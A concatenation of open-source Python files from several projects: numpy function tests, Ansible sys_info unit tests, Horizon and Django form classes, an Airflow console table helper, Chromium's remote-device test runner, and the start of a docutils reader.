self.run_test("def np_allclose2(a): from numpy import array, allclose; return allclose(array([1e10,1e-8]), a)", numpy.array([1.00001e10,1e-9]), np_allclose2=[numpy.array([float])])
def test_allclose3(self):
self.run_test("def np_allclose3(a): from numpy import allclose; return allclose(a, a)", [1.0, numpy.nan], np_allclose3=[[float]])
def test_allclose4(self):
""" Check allclose behavior with infinity values. """
self.run_test("""
def np_allclose4(a):
from numpy import array, allclose
return allclose(array([-float('inf'), float('inf'),
-float('inf')]), a)""",
numpy.array([float("inf"), float("inf"), -float('inf')]),
np_allclose4=[numpy.array([float])])
def test_alltrue0(self):
self.run_test("def np_alltrue0(b): from numpy import alltrue ; return alltrue(b)", numpy.array([True, False, True, True]), np_alltrue0=[numpy.array([bool])])
def test_alltrue1(self):
self.run_test("def np_alltrue1(a): from numpy import alltrue ; return alltrue(a >= 5)", numpy.array([1, 5, 2, 7]), np_alltrue1=[numpy.array([int])])
def test_count_nonzero0(self):
self.run_test("def np_count_nonzero0(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([[-1, -5, -2, 7], [9, 3, 0, -0]]), np_count_nonzero0=[numpy.array([[int]])])
def test_count_nonzero1(self):
self.run_test("def np_count_nonzero1(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([-1, 5, -2, 0]), np_count_nonzero1=[numpy.array([int])])
def test_count_nonzero2(self):
self.run_test("def np_count_nonzero2(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([-1., 0., -2., -1e-20]), np_count_nonzero2=[numpy.array([float])])
def test_count_nonzero3(self):
self.run_test("def np_count_nonzero3(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([[0, 2, 0., 4 + 1j], [0.+0.j, 0.+4j, 1.+0j, 1j]]), np_count_nonzero3=[numpy.array([[complex]])])
def test_count_nonzero4(self):
self.run_test("def np_count_nonzero4(a): from numpy import count_nonzero; return count_nonzero(a)",
numpy.array([[True, False], [False, False]]), np_count_nonzero4=[numpy.array([[bool]])])
def test_count_nonzero5(self):
self.run_test("def np_count_nonzero5(a): from numpy import count_nonzero; return count_nonzero(a*2)",
numpy.array([[-1, -5, -2, 7], [9, 3, 0, -0]]), np_count_nonzero5=[numpy.array([[int]])])
def test_isclose0(self):
self.run_test("def np_isclose0(u): from numpy import isclose; return isclose(u, u)",
numpy.array([[-1.01, 1e-10+1e-11, -0, 7., float('NaN')], [-1.0, 1e-10, 0., 7., float('NaN')]]),
np_isclose0=[numpy.array([[float]])])
def test_isclose1(self):
self.run_test("def np_isclose1(u, v): from numpy import isclose; return isclose(u, v, 1e-19, 1e-16)",
numpy.array([-1.01, 1e-10+1e-11, float("inf"), 7.]),
numpy.array([9., 1e-10, float("inf"), float('NaN')]),
np_isclose1=[numpy.array([float]), numpy.array([float])])
def test_isclose2(self):
self.run_test("def np_isclose2(u,v): from numpy import isclose; return isclose(u, v, 1e-16, 1e-19)",
numpy.array([-1.01, 1e-10+1e-11, -0, 7., float('NaN')]),
numpy.array([-1., 1e-10+2e-11, -0, 7.1, float('NaN')]),
np_isclose2=[numpy.array([float]), numpy.array([float])])
def test_isclose3(self):
self.run_test("def np_isclose3(u): from numpy import isclose; return isclose(u, u)",
numpy.array([9.+3j, 1e-10, 1.1j, float('NaN')]),
np_isclose3=[numpy.array([complex])])
def test_isclose4(self):
self.run_test("def np_isclose4(u,v): from numpy import isclose; return isclose(u, v)",
numpy.array([True, False, True, True, False]),
numpy.array([True, False, False, True, True]),
np_isclose4=[numpy.array([bool]), numpy.array([bool])])
@unittest.expectedFailure
def test_isclose5(self):
self.run_test("def np_isclose5(u,v): from numpy import isclose; return isclose(u, v)",
1e-10,
1e-10+1e-11,
np_isclose5=[float, float])
@unittest.expectedFailure
def test_isclose6(self):
self.run_test("def np_isclose6(u, v): from numpy import isclose; return isclose(u, v, 1e-19, 1e-16)",
numpy.array([[-float("inf"), 1e-10+1e-11, -0, 7.],[9., 1e-10, 0., float('NaN')]]),
numpy.array([float("inf"), 1e-10, 0., float('NaN')]),
np_isclose6=[numpy.array([[float]]), numpy.array([float])])
@unittest.expectedFailure
def test_isclose7(self):
self.run_test("def np_isclose7(u, v): from numpy import isclose; return isclose(u, v, 1e-19, 1e-16)",
numpy.array([9., 1e-10, 0., float('NaN')]),
numpy.array([[-1.01, 1e-10+1e-11, -0, 7.],[9., 1e-10, 0., float('NaN')]]),
np_isclose7=[numpy.array([float]), numpy.array([[float]])])
| bsd-3-clause |
thaumos/ansible | test/units/module_utils/common/test_sys_info.py | 45 | 5231 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2016 Toshio Kuratomi <[email protected]>
# (c) 2017-2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
from units.compat.mock import patch
from ansible.module_utils.six.moves import builtins
# Functions being tested
from ansible.module_utils.common.sys_info import get_distribution
from ansible.module_utils.common.sys_info import get_distribution_version
from ansible.module_utils.common.sys_info import get_platform_subclass
realimport = builtins.__import__
@pytest.fixture
def platform_linux(mocker):
mocker.patch('platform.system', return_value='Linux')
#
# get_distribution tests
#
def test_get_distribution_not_linux():
"""If it's not Linux, then it has no distribution"""
with patch('platform.system', return_value='Foo'):
assert get_distribution() is None
@pytest.mark.usefixtures("platform_linux")
class TestGetDistribution:
"""Tests for get_distribution that have to find something"""
def test_distro_known(self):
with patch('ansible.module_utils.distro.id', return_value="alpine"):
assert get_distribution() == "Alpine"
with patch('ansible.module_utils.distro.id', return_value="arch"):
assert get_distribution() == "Arch"
with patch('ansible.module_utils.distro.id', return_value="centos"):
assert get_distribution() == "Centos"
with patch('ansible.module_utils.distro.id', return_value="clear-linux-os"):
assert get_distribution() == "Clear-linux-os"
with patch('ansible.module_utils.distro.id', return_value="coreos"):
assert get_distribution() == "Coreos"
with patch('ansible.module_utils.distro.id', return_value="debian"):
assert get_distribution() == "Debian"
with patch('ansible.module_utils.distro.id', return_value="linuxmint"):
assert get_distribution() == "Linuxmint"
with patch('ansible.module_utils.distro.id', return_value="opensuse"):
assert get_distribution() == "Opensuse"
with patch('ansible.module_utils.distro.id', return_value="oracle"):
assert get_distribution() == "Oracle"
with patch('ansible.module_utils.distro.id', return_value="raspian"):
assert get_distribution() == "Raspian"
with patch('ansible.module_utils.distro.id', return_value="rhel"):
assert get_distribution() == "Redhat"
with patch('ansible.module_utils.distro.id', return_value="ubuntu"):
assert get_distribution() == "Ubuntu"
with patch('ansible.module_utils.distro.id', return_value="virtuozzo"):
assert get_distribution() == "Virtuozzo"
with patch('ansible.module_utils.distro.id', return_value="foo"):
assert get_distribution() == "Foo"
def test_distro_unknown(self):
with patch('ansible.module_utils.distro.id', return_value=""):
assert get_distribution() == "OtherLinux"
def test_distro_amazon_linux_short(self):
with patch('ansible.module_utils.distro.id', return_value="amzn"):
assert get_distribution() == "Amazon"
def test_distro_amazon_linux_long(self):
with patch('ansible.module_utils.distro.id', return_value="amazon"):
assert get_distribution() == "Amazon"
#
# get_distribution_version tests
#
def test_get_distribution_version_not_linux():
"""If it's not Linux, then it has no distribution"""
with patch('platform.system', return_value='Foo'):
assert get_distribution_version() is None
@pytest.mark.usefixtures("platform_linux")
def test_distro_found():
with patch('ansible.module_utils.distro.version', return_value="1"):
assert get_distribution_version() == "1"
#
# Tests for get_platform_subclass
#
class TestGetPlatformSubclass:
class LinuxTest:
pass
class Foo(LinuxTest):
platform = "Linux"
distribution = None
class Bar(LinuxTest):
platform = "Linux"
distribution = "Bar"
def test_not_linux(self):
# if neither match, the fallback should be the top-level class
with patch('platform.system', return_value="Foo"):
with patch('ansible.module_utils.common.sys_info.get_distribution', return_value=None):
assert get_platform_subclass(self.LinuxTest) is self.LinuxTest
@pytest.mark.usefixtures("platform_linux")
def test_get_distribution_none(self):
# match just the platform class, not a specific distribution
with patch('ansible.module_utils.common.sys_info.get_distribution', return_value=None):
assert get_platform_subclass(self.LinuxTest) is self.Foo
@pytest.mark.usefixtures("platform_linux")
def test_get_distribution_found(self):
# match both the distribution and platform class
with patch('ansible.module_utils.common.sys_info.get_distribution', return_value="Bar"):
assert get_platform_subclass(self.LinuxTest) is self.Bar
| gpl-3.0 |
yeming233/horizon | openstack_dashboard/dashboards/admin/volume_types/extras/forms.py | 3 | 2389 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from openstack_dashboard import api
from horizon import exceptions
from horizon import forms
from horizon import messages
class CreateExtraSpec(forms.SelfHandlingForm):
key = forms.CharField(max_length=255, label=_("Key"))
value = forms.CharField(max_length=255, label=_("Value"))
def handle(self, request, data):
type_id = self.initial['type_id']
try:
api.cinder.volume_type_extra_set(request,
type_id,
{data['key']: data['value']})
msg = _('Created extra spec "%s".') % data['key']
messages.success(request, msg)
return True
except Exception:
redirect = reverse("horizon:admin:volume_types:index")
exceptions.handle(request,
_("Unable to create volume type extra spec."),
redirect=redirect)
class EditExtraSpec(forms.SelfHandlingForm):
value = forms.CharField(max_length=255, label=_("Value"))
def handle(self, request, data):
key = self.initial['key']
type_id = self.initial['type_id']
try:
api.cinder.volume_type_extra_set(request,
type_id,
{key: data['value']})
msg = _('Saved extra spec "%s".') % key
messages.success(request, msg)
return True
except Exception:
redirect = reverse("horizon:admin:volume_types:index")
exceptions.handle(request,
_("Unable to edit volume type extra spec."),
redirect=redirect)
| apache-2.0 |
kevinr/750book-web | 750book-web-env/lib/python2.7/site-packages/django/contrib/comments/forms.py | 65 | 7896 | import time
import datetime
from django import forms
from django.forms.util import ErrorDict
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from models import Comment
from django.utils.encoding import force_unicode
from django.utils.hashcompat import sha_constructor
from django.utils.text import get_text_list
from django.utils.translation import ungettext, ugettext_lazy as _
COMMENT_MAX_LENGTH = getattr(settings,'COMMENT_MAX_LENGTH', 3000)
class CommentSecurityForm(forms.Form):
"""
Handles the security aspects (anti-spoofing) for comment forms.
"""
content_type = forms.CharField(widget=forms.HiddenInput)
object_pk = forms.CharField(widget=forms.HiddenInput)
timestamp = forms.IntegerField(widget=forms.HiddenInput)
security_hash = forms.CharField(min_length=40, max_length=40, widget=forms.HiddenInput)
def __init__(self, target_object, data=None, initial=None):
self.target_object = target_object
if initial is None:
initial = {}
initial.update(self.generate_security_data())
super(CommentSecurityForm, self).__init__(data=data, initial=initial)
def security_errors(self):
"""Return just those errors associated with security"""
errors = ErrorDict()
for f in ["honeypot", "timestamp", "security_hash"]:
if f in self.errors:
errors[f] = self.errors[f]
return errors
def clean_security_hash(self):
"""Check the security hash."""
security_hash_dict = {
'content_type' : self.data.get("content_type", ""),
'object_pk' : self.data.get("object_pk", ""),
'timestamp' : self.data.get("timestamp", ""),
}
expected_hash = self.generate_security_hash(**security_hash_dict)
actual_hash = self.cleaned_data["security_hash"]
if expected_hash != actual_hash:
raise forms.ValidationError("Security hash check failed.")
return actual_hash
def clean_timestamp(self):
"""Make sure the timestamp isn't too far (> 2 hours) in the past."""
ts = self.cleaned_data["timestamp"]
if time.time() - ts > (2 * 60 * 60):
raise forms.ValidationError("Timestamp check failed")
return ts
def generate_security_data(self):
"""Generate a dict of security data for "initial" data."""
timestamp = int(time.time())
security_dict = {
'content_type' : str(self.target_object._meta),
'object_pk' : str(self.target_object._get_pk_val()),
'timestamp' : str(timestamp),
'security_hash' : self.initial_security_hash(timestamp),
}
return security_dict
def initial_security_hash(self, timestamp):
"""
Generate the initial security hash from self.content_object
and a (unix) timestamp.
"""
initial_security_dict = {
'content_type' : str(self.target_object._meta),
'object_pk' : str(self.target_object._get_pk_val()),
'timestamp' : str(timestamp),
}
return self.generate_security_hash(**initial_security_dict)
def generate_security_hash(self, content_type, object_pk, timestamp):
"""Generate a (SHA1) security hash from the provided info."""
info = (content_type, object_pk, timestamp, settings.SECRET_KEY)
return sha_constructor("".join(info)).hexdigest()
class CommentDetailsForm(CommentSecurityForm):
"""
Handles the specific details of the comment (name, comment, etc.).
"""
name = forms.CharField(label=_("Name"), max_length=50)
email = forms.EmailField(label=_("Email address"))
url = forms.URLField(label=_("URL"), required=False)
comment = forms.CharField(label=_('Comment'), widget=forms.Textarea,
max_length=COMMENT_MAX_LENGTH)
def get_comment_object(self):
"""
Return a new (unsaved) comment object based on the information in this
form. Assumes that the form is already validated and will throw a
ValueError if not.
Does not set any of the fields that would come from a Request object
(i.e. ``user`` or ``ip_address``).
"""
if not self.is_valid():
raise ValueError("get_comment_object may only be called on valid forms")
CommentModel = self.get_comment_model()
new = CommentModel(**self.get_comment_create_data())
new = self.check_for_duplicate_comment(new)
return new
def get_comment_model(self):
"""
Get the comment model to create with this form. Subclasses in custom
comment apps should override this, get_comment_create_data, and perhaps
check_for_duplicate_comment to provide custom comment models.
"""
return Comment
def get_comment_create_data(self):
"""
Returns the dict of data to be used to create a comment. Subclasses in
custom comment apps that override get_comment_model can override this
method to add extra fields onto a custom comment model.
"""
return dict(
content_type = ContentType.objects.get_for_model(self.target_object),
object_pk = force_unicode(self.target_object._get_pk_val()),
user_name = self.cleaned_data["name"],
user_email = self.cleaned_data["email"],
user_url = self.cleaned_data["url"],
comment = self.cleaned_data["comment"],
submit_date = datetime.datetime.now(),
site_id = settings.SITE_ID,
is_public = True,
is_removed = False,
)
def check_for_duplicate_comment(self, new):
"""
Check that a submitted comment isn't a duplicate. This might be caused
by someone posting a comment twice. If it is a dup, silently return the *previous* comment.
"""
possible_duplicates = self.get_comment_model()._default_manager.using(
self.target_object._state.db
).filter(
content_type = new.content_type,
object_pk = new.object_pk,
user_name = new.user_name,
user_email = new.user_email,
user_url = new.user_url,
)
for old in possible_duplicates:
if old.submit_date.date() == new.submit_date.date() and old.comment == new.comment:
return old
return new
def clean_comment(self):
"""
If COMMENTS_ALLOW_PROFANITIES is False, check that the comment doesn't
contain anything in PROFANITIES_LIST.
"""
comment = self.cleaned_data["comment"]
if settings.COMMENTS_ALLOW_PROFANITIES == False:
bad_words = [w for w in settings.PROFANITIES_LIST if w in comment.lower()]
if bad_words:
plural = len(bad_words) > 1
raise forms.ValidationError(ungettext(
"Watch your mouth! The word %s is not allowed here.",
"Watch your mouth! The words %s are not allowed here.", plural) % \
get_text_list(['"%s%s%s"' % (i[0], '-'*(len(i)-2), i[-1]) for i in bad_words], 'and'))
return comment
class CommentForm(CommentDetailsForm):
honeypot = forms.CharField(required=False,
label=_('If you enter anything in this field '\
'your comment will be treated as spam'))
def clean_honeypot(self):
"""Check that nothing's been entered into the honeypot."""
value = self.cleaned_data["honeypot"]
if value:
raise forms.ValidationError(self.fields["honeypot"].label)
return value
| mit |
mistercrunch/airflow | airflow/cli/simple_table.py | 5 | 4581 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import inspect
import json
from typing import Any, Callable, Dict, List, Optional, Union
import yaml
from rich.box import ASCII_DOUBLE_HEAD
from rich.console import Console
from rich.syntax import Syntax
from rich.table import Table
from airflow.plugins_manager import PluginsDirectorySource
class AirflowConsole(Console):
"""Airflow rich console"""
def print_as_json(self, data: Dict):
"""Renders dict as json text representation"""
json_content = json.dumps(data)
self.print(Syntax(json_content, "json", theme="ansi_dark"), soft_wrap=True)
def print_as_yaml(self, data: Dict):
"""Renders dict as yaml text representation"""
yaml_content = yaml.dump(data)
self.print(Syntax(yaml_content, "yaml", theme="ansi_dark"), soft_wrap=True)
def print_as_table(self, data: List[Dict]):
"""Renders list of dictionaries as table"""
if not data:
self.print("No data found")
return
table = SimpleTable(
show_header=True,
)
for col in data[0].keys():
table.add_column(col)
for row in data:
table.add_row(*[str(d) for d in row.values()])
self.print(table)
# pylint: disable=too-many-return-statements
def _normalize_data(self, value: Any, output: str) -> Optional[Union[list, str, dict]]:
if isinstance(value, (tuple, list)):
if output == "table":
return ",".join(self._normalize_data(x, output) for x in value)
return [self._normalize_data(x, output) for x in value]
if isinstance(value, dict) and output != "table":
return {k: self._normalize_data(v, output) for k, v in value.items()}
if inspect.isclass(value) and not isinstance(value, PluginsDirectorySource):
return value.__name__
if value is None:
return None
return str(value)
def print_as(self, data: List[Union[Dict, Any]], output: str, mapper: Optional[Callable] = None):
"""Prints provided using format specified by output argument"""
output_to_renderer = {
"json": self.print_as_json,
"yaml": self.print_as_yaml,
"table": self.print_as_table,
}
renderer = output_to_renderer.get(output)
if not renderer:
raise ValueError(
f"Unknown formatter: {output}. Allowed options: {list(output_to_renderer.keys())}"
)
if not all(isinstance(d, dict) for d in data) and not mapper:
raise ValueError("To tabulate non-dictionary data you need to provide `mapper` function")
if mapper:
dict_data: List[Dict] = [mapper(d) for d in data]
else:
dict_data: List[Dict] = data
dict_data = [{k: self._normalize_data(v, output) for k, v in d.items()} for d in dict_data]
renderer(dict_data)
class SimpleTable(Table):
"""A rich Table with some default hardcoded for consistency."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.show_edge = kwargs.get("show_edge", False)
self.pad_edge = kwargs.get("pad_edge", False)
self.box = kwargs.get("box", ASCII_DOUBLE_HEAD)
self.show_header = kwargs.get("show_header", False)
self.title_style = kwargs.get("title_style", "bold green")
self.title_justify = kwargs.get("title_justify", "left")
self.caption = kwargs.get("caption", " ")
def add_column(self, *args, **kwargs) -> None: # pylint: disable=signature-differs
"""Add a column to the table. We use different default"""
kwargs["overflow"] = kwargs.get("overflow", None) # to avoid truncating
super().add_column(*args, **kwargs)
| apache-2.0 |
vadimtk/chrome4sdp | build/android/pylib/remote/device/remote_device_test_run.py | 2 | 15140 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Run specific test on specific environment."""
import json
import logging
import os
import re
import shutil
import string
import tempfile
import time
import zipfile
from pylib.base import base_test_result
from pylib.base import test_run
from pylib.remote.device import appurify_constants
from pylib.remote.device import appurify_sanitized
from pylib.remote.device import remote_device_helper
from pylib.utils import zip_utils
_DEVICE_OFFLINE_RE = re.compile('error: device not found')
_LONG_MSG_RE = re.compile('longMsg=')
_SHORT_MSG_RE = re.compile('shortMsg=')
class RemoteDeviceTestRun(test_run.TestRun):
"""Run tests on a remote device."""
_TEST_RUN_KEY = 'test_run'
_TEST_RUN_ID_KEY = 'test_run_id'
WAIT_TIME = 5
COMPLETE = 'complete'
HEARTBEAT_INTERVAL = 300
def __init__(self, env, test_instance):
"""Constructor.
Args:
env: Environment the tests will run in.
test_instance: The test that will be run.
"""
super(RemoteDeviceTestRun, self).__init__(env, test_instance)
self._env = env
self._test_instance = test_instance
self._app_id = ''
self._test_id = ''
self._results = ''
self._test_run_id = ''
self._results_temp_dir = None
#override
def SetUp(self):
"""Set up a test run."""
if self._env.trigger:
self._TriggerSetUp()
elif self._env.collect:
assert isinstance(self._env.collect, basestring), (
'File for storing test_run_id must be a string.')
with open(self._env.collect, 'r') as persisted_data_file:
persisted_data = json.loads(persisted_data_file.read())
self._env.LoadFrom(persisted_data)
self.LoadFrom(persisted_data)
def _TriggerSetUp(self):
"""Set up the triggering of a test run."""
raise NotImplementedError
#override
def RunTests(self):
"""Run the test."""
if self._env.trigger:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_start_res = appurify_sanitized.api.tests_run(
self._env.token, self._env.device_type_id, self._app_id,
self._test_id)
remote_device_helper.TestHttpResponse(
test_start_res, 'Unable to run test.')
self._test_run_id = test_start_res.json()['response']['test_run_id']
logging.info('Test run id: %s' % self._test_run_id)
if self._env.collect:
current_status = ''
timeout_counter = 0
heartbeat_counter = 0
while self._GetTestStatus(self._test_run_id) != self.COMPLETE:
if self._results['detailed_status'] != current_status:
logging.info('Test status: %s', self._results['detailed_status'])
current_status = self._results['detailed_status']
timeout_counter = 0
heartbeat_counter = 0
if heartbeat_counter > self.HEARTBEAT_INTERVAL:
logging.info('Test status: %s', self._results['detailed_status'])
heartbeat_counter = 0
timeout = self._env.timeouts.get(
current_status, self._env.timeouts['unknown'])
if timeout_counter > timeout:
raise remote_device_helper.RemoteDeviceError(
'Timeout while in %s state for %s seconds'
% (current_status, timeout),
is_infra_error=True)
time.sleep(self.WAIT_TIME)
timeout_counter += self.WAIT_TIME
heartbeat_counter += self.WAIT_TIME
self._DownloadTestResults(self._env.results_path)
if self._results['results']['exception']:
raise remote_device_helper.RemoteDeviceError(
self._results['results']['exception'], is_infra_error=True)
return self._ParseTestResults()
#override
def TearDown(self):
"""Tear down the test run."""
if self._env.collect:
self._CollectTearDown()
elif self._env.trigger:
assert isinstance(self._env.trigger, basestring), (
'File for storing test_run_id must be a string.')
with open(self._env.trigger, 'w') as persisted_data_file:
persisted_data = {}
self.DumpTo(persisted_data)
self._env.DumpTo(persisted_data)
persisted_data_file.write(json.dumps(persisted_data))
def _CollectTearDown(self):
if self._GetTestStatus(self._test_run_id) != self.COMPLETE:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_abort_res = appurify_sanitized.api.tests_abort(
self._env.token, self._test_run_id, reason='Test runner exiting.')
remote_device_helper.TestHttpResponse(test_abort_res,
'Unable to abort test.')
if self._results_temp_dir:
shutil.rmtree(self._results_temp_dir)
def __enter__(self):
"""Set up the test run when used as a context manager."""
self.SetUp()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Tear down the test run when used as a context manager."""
self.TearDown()
def DumpTo(self, persisted_data):
test_run_data = {
self._TEST_RUN_ID_KEY: self._test_run_id,
}
persisted_data[self._TEST_RUN_KEY] = test_run_data
def LoadFrom(self, persisted_data):
test_run_data = persisted_data[self._TEST_RUN_KEY]
self._test_run_id = test_run_data[self._TEST_RUN_ID_KEY]
def _ParseTestResults(self):
raise NotImplementedError
def _GetTestByName(self, test_name):
"""Gets test_id for specific test.
Args:
test_name: Test to find the ID of.
"""
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_list_res = appurify_sanitized.api.tests_list(self._env.token)
remote_device_helper.TestHttpResponse(test_list_res,
'Unable to get tests list.')
for test in test_list_res.json()['response']:
if test['test_type'] == test_name:
return test['test_id']
raise remote_device_helper.RemoteDeviceError(
'No test found with name %s' % (test_name))
def _DownloadTestResults(self, results_path):
"""Download the test results from remote device service.
Downloads results in temporary location, and then copys results
to results_path if results_path is not set to None.
Args:
results_path: Path to download appurify results zipfile.
Returns:
Path to downloaded file.
"""
if self._results_temp_dir is None:
self._results_temp_dir = tempfile.mkdtemp()
logging.info('Downloading results to %s.' % self._results_temp_dir)
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
appurify_sanitized.utils.wget(self._results['results']['url'],
self._results_temp_dir + '/results')
if results_path:
logging.info('Copying results to %s', results_path)
if not os.path.exists(os.path.dirname(results_path)):
os.makedirs(os.path.dirname(results_path))
shutil.copy(self._results_temp_dir + '/results', results_path)
return self._results_temp_dir + '/results'
def _GetTestStatus(self, test_run_id):
"""Checks the state of the test, and sets self._results
Args:
test_run_id: Id of test on on remote service.
"""
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
test_check_res = appurify_sanitized.api.tests_check_result(
self._env.token, test_run_id)
remote_device_helper.TestHttpResponse(test_check_res,
'Unable to get test status.')
self._results = test_check_res.json()['response']
return self._results['status']
def _AmInstrumentTestSetup(self, app_path, test_path, runner_package,
environment_variables, extra_apks=None):
config = {'runner': runner_package}
if environment_variables:
config['environment_vars'] = ','.join(
'%s=%s' % (k, v) for k, v in environment_variables.iteritems())
self._app_id = self._UploadAppToDevice(app_path)
data_deps = self._test_instance.GetDataDependencies()
if data_deps:
with tempfile.NamedTemporaryFile(suffix='.zip') as test_with_deps:
sdcard_files = []
additional_apks = []
host_test = os.path.basename(test_path)
with zipfile.ZipFile(test_with_deps.name, 'w') as zip_file:
zip_file.write(test_path, host_test, zipfile.ZIP_DEFLATED)
for h, _ in data_deps:
if os.path.isdir(h):
zip_utils.WriteToZipFile(zip_file, h, '.')
sdcard_files.extend(os.listdir(h))
else:
zip_utils.WriteToZipFile(zip_file, h, os.path.basename(h))
sdcard_files.append(os.path.basename(h))
for a in extra_apks or ():
zip_utils.WriteToZipFile(zip_file, a, os.path.basename(a));
additional_apks.append(os.path.basename(a))
config['sdcard_files'] = ','.join(sdcard_files)
config['host_test'] = host_test
if additional_apks:
config['additional_apks'] = ','.join(additional_apks)
self._test_id = self._UploadTestToDevice(
'robotium', test_with_deps.name, app_id=self._app_id)
else:
self._test_id = self._UploadTestToDevice('robotium', test_path)
logging.info('Setting config: %s' % config)
appurify_configs = {}
if self._env.network_config:
appurify_configs['network'] = self._env.network_config
self._SetTestConfig('robotium', config, **appurify_configs)
def _UploadAppToDevice(self, app_path):
"""Upload app to device."""
logging.info('Uploading %s to remote service as %s.', app_path,
self._test_instance.suite)
with open(app_path, 'rb') as apk_src:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
upload_results = appurify_sanitized.api.apps_upload(
self._env.token, apk_src, 'raw', name=self._test_instance.suite)
remote_device_helper.TestHttpResponse(
upload_results, 'Unable to upload %s.' % app_path)
return upload_results.json()['response']['app_id']
def _UploadTestToDevice(self, test_type, test_path, app_id=None):
"""Upload test to device
Args:
test_type: Type of test that is being uploaded. Ex. uirobot, gtest..
"""
logging.info('Uploading %s to remote service.' % test_path)
with open(test_path, 'rb') as test_src:
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
upload_results = appurify_sanitized.api.tests_upload(
self._env.token, test_src, 'raw', test_type, app_id=app_id)
remote_device_helper.TestHttpResponse(upload_results,
'Unable to upload %s.' % test_path)
return upload_results.json()['response']['test_id']
def _SetTestConfig(self, runner_type, runner_configs,
network=appurify_constants.NETWORK.WIFI_1_BAR,
pcap=0, profiler=0, videocapture=0):
"""Generates and uploads config file for test.
Args:
runner_configs: Configs specific to the runner you are using.
network: Config to specify the network environment the devices running
the tests will be in.
pcap: Option to set the recording the of network traffic from the device.
profiler: Option to set the recording of CPU, memory, and network
transfer usage in the tests.
videocapture: Option to set video capture during the tests.
"""
logging.info('Generating config file for test.')
with tempfile.TemporaryFile() as config:
config_data = [
'[appurify]',
'network=%s' % network,
'pcap=%s' % pcap,
'profiler=%s' % profiler,
'videocapture=%s' % videocapture,
'[%s]' % runner_type
]
config_data.extend(
'%s=%s' % (k, v) for k, v in runner_configs.iteritems())
config.write(''.join('%s\n' % l for l in config_data))
config.flush()
config.seek(0)
with appurify_sanitized.SanitizeLogging(self._env.verbose_count,
logging.WARNING):
config_response = appurify_sanitized.api.config_upload(
self._env.token, config, self._test_id)
remote_device_helper.TestHttpResponse(
config_response, 'Unable to upload test config.')
def _LogLogcat(self, level=logging.CRITICAL):
"""Prints out logcat downloaded from remote service.
Args:
level: logging level to print at.
Raises:
KeyError: If appurify_results/logcat.txt file cannot be found in
downloaded zip.
"""
zip_file = self._DownloadTestResults(None)
with zipfile.ZipFile(zip_file) as z:
try:
logcat = z.read('appurify_results/logcat.txt')
printable_logcat = ''.join(c for c in logcat if c in string.printable)
for line in printable_logcat.splitlines():
logging.log(level, line)
except KeyError:
logging.error('No logcat found.')
def _LogAdbTraceLog(self):
zip_file = self._DownloadTestResults(None)
with zipfile.ZipFile(zip_file) as z:
adb_trace_log = z.read('adb_trace.log')
for line in adb_trace_log.splitlines():
logging.critical(line)
def _DidDeviceGoOffline(self):
zip_file = self._DownloadTestResults(None)
with zipfile.ZipFile(zip_file) as z:
adb_trace_log = z.read('adb_trace.log')
if any(_DEVICE_OFFLINE_RE.search(l) for l in adb_trace_log.splitlines()):
return True
return False
def _DetectPlatformErrors(self, results):
if not self._results['results']['pass']:
if any(_SHORT_MSG_RE.search(l)
for l in self._results['results']['output'].splitlines()):
self._LogLogcat()
for line in self._results['results']['output'].splitlines():
if _LONG_MSG_RE.search(line):
results.AddResult(base_test_result.BaseTestResult(
line.split('=')[1], base_test_result.ResultType.CRASH))
break
else:
results.AddResult(base_test_result.BaseTestResult(
'Unknown platform error detected.',
base_test_result.ResultType.UNKNOWN))
elif self._DidDeviceGoOffline():
self._LogLogcat()
self._LogAdbTraceLog()
raise remote_device_helper.RemoteDeviceError(
'Remote service unable to reach device.', is_infra_error=True)
else:
results.AddResult(base_test_result.BaseTestResult(
'Remote Service detected error.',
base_test_result.ResultType.UNKNOWN))
| bsd-3-clause |
ojengwa/oh-mainline | vendor/packages/docutils/docutils/readers/standalone.py | 197 | 2340 | # $Id: standalone.py 4802 2006-11-12 18:02:17Z goodger $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Standalone file Reader for the reStructuredText markup syntax.
"""
__docformat__ = 'reStructuredText'
import sys
from docutils import frontend, readers
from docutils.transforms import frontmatter, references, misc
class Reader(readers.Reader):
supported = ('standalone',)
"""Contexts this reader supports."""
document = None
"""A single document tree."""
settings_spec = (
'Standalone Reader',
None,
